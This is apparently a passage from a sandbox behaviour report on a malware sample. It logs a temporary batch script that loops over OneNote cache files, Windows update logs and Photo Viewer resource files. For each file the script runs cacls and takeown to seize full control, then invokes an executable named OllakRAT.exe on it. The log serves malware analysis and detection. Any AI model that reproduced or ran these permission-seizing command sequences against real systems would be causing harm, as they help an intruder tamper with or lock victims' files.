  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.e717f9bf-c379-44d8-9447-f862cdb6600e.1.etl""
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.e717f9bf-c379-44d8-9447-f862cdb6600e.1.etl" /E /G Admin:F /C
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.e717f9bf-c379-44d8-9447-f862cdb6600e.1.etl"
    3⤵
    - Modifies file permissions
    PID:6000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "WuProvider.e717f9bf-c379-44d8-9447-f862cdb6600e.1.etl" -nobanner
    3⤵
    PID:4284
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "WuProvider.e717f9bf-c379-44d8-9447-f862cdb6600e.1.etl" -nobanner
      4⤵
      PID:1320
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.faff925d-6b66-44f8-80e5-3bc40950c796.1.etl""
  2⤵
  PID:2180
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.faff925d-6b66-44f8-80e5-3bc40950c796.1.etl" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.faff925d-6b66-44f8-80e5-3bc40950c796.1.etl"
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "MoUsoCoreWorker.faff925d-6b66-44f8-80e5-3bc40950c796.1.etl" -nobanner
    3⤵
    PID:944
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "MoUsoCoreWorker.faff925d-6b66-44f8-80e5-3bc40950c796.1.etl" -nobanner
      4⤵
      PID:5760
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""
  2⤵
  PID:952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000006H.bin" -nobanner
    3⤵
    PID:3308
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000006H.bin" -nobanner
      4⤵
      PID:5508
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""
  2⤵
  PID:736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C
    3⤵
    PID:5208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"
    3⤵
    - Modifies file permissions
    PID:5488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000075.bin" -nobanner
    3⤵
    PID:5984
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000075.bin" -nobanner
      4⤵
      PID:5884
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""
  2⤵
  PID:5408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"
    3⤵
    - Modifies file permissions
    PID:5932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000004.bin" -nobanner
    3⤵
    PID:6072
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000004.bin" -nobanner
      4⤵
      PID:2404
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""
  2⤵
  PID:2296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"
    3⤵
    - Modifies file permissions
    PID:4928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000H.bin" -nobanner
    3⤵
    PID:800
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000H.bin" -nobanner
      4⤵
      PID:5592
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""
  2⤵
  PID:3896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C
    3⤵
    PID:5656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000S.bin" -nobanner
    3⤵
    PID:3376
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000S.bin" -nobanner
      4⤵
      PID:5048
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""
  2⤵
  PID:5156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"
    3⤵
    - Modifies file permissions
    PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000016.bin" -nobanner
    3⤵
    PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000016.bin" -nobanner
      4⤵
      PID:4012
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""
  2⤵
  PID:5768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000050.bin" -nobanner
    3⤵
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000050.bin" -nobanner
      4⤵
      PID:3096
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""
  2⤵
  PID:6016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C
    3⤵
    PID:5868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000083.bin" -nobanner
    3⤵
    PID:5620
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000083.bin" -nobanner
      4⤵
      PID:4544
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""
  2⤵
  PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C
    3⤵
    PID:944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000009F.bin" -nobanner
    3⤵
    PID:2524
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000009F.bin" -nobanner
      4⤵
      PID:4892
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""
  2⤵
  PID:6080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "000000AL.bin" -nobanner
    3⤵
    PID:3276
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "000000AL.bin" -nobanner
      4⤵
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""
  2⤵
  PID:5164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C
    3⤵
    PID:4712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"
    3⤵
    PID:5976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "000000B1.bin" -nobanner
    3⤵
    PID:5424
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "000000B1.bin" -nobanner
      4⤵
      PID:6004
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""
  2⤵
  PID:5128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"
    3⤵
    - Modifies file permissions
    PID:4564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000006S.bin" -nobanner
    3⤵
    PID:5512
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000006S.bin" -nobanner
      4⤵
      PID:692
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin""
  2⤵
  PID:5464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C
    3⤵
    PID:280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"
    3⤵
    PID:800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000076.bin" -nobanner
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000076.bin" -nobanner
      4⤵
      PID:2852
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin""
  2⤵
  PID:2444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"
    3⤵
    PID:436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007G.bin" -nobanner
    3⤵
    PID:1688
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007G.bin" -nobanner
      4⤵
      PID:5600
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin""
  2⤵
  PID:5812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"
    3⤵
    - Modifies file permissions
    PID:5376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007Q.bin" -nobanner
    3⤵
    PID:5260
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007Q.bin" -nobanner
      4⤵
      PID:5372
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin""
  2⤵
  PID:2060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" /E /G Admin:F /C
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin"
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000008F.bin" -nobanner
    3⤵
    PID:5116
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000008F.bin" -nobanner
      4⤵
      PID:5320
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin""
  2⤵
  PID:5092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" /E /G Admin:F /C
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin"
    3⤵
    - Modifies file permissions
    PID:660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000095.bin" -nobanner
    3⤵
    PID:5548
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000095.bin" -nobanner
      4⤵
      PID:5868
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin""
  2⤵
  PID:892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" /E /G Admin:F /C
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin"
    3⤵
    PID:3784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "000000A0.bin" -nobanner
    3⤵
    PID:3324
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "000000A0.bin" -nobanner
      4⤵
      PID:4036
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:2320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5988
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:5552
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:1096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4324
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5860
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""
  2⤵
  PID:5132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000C.bin" -nobanner
    3⤵
    PID:5984
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000C.bin" -nobanner
      4⤵
      PID:6120
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin""
  2⤵
  PID:4116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin" /E /G Admin:F /C
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin"
    3⤵
    PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000O.bin" -nobanner
    3⤵
    PID:3084
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000O.bin" -nobanner
      4⤵
      PID:2716
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin""
  2⤵
  PID:5404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin" /E /G Admin:F /C
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin"
    3⤵
    - Modifies file permissions
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000012.bin" -nobanner
    3⤵
    PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000012.bin" -nobanner
      4⤵
      PID:4728
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin""
  2⤵
  PID:436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin" /E /G Admin:F /C
    3⤵
    PID:5780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin"
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000056.bin" -nobanner
    3⤵
    PID:1144
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000056.bin" -nobanner
      4⤵
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""
  2⤵
  PID:3980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"
    3⤵
    PID:4052
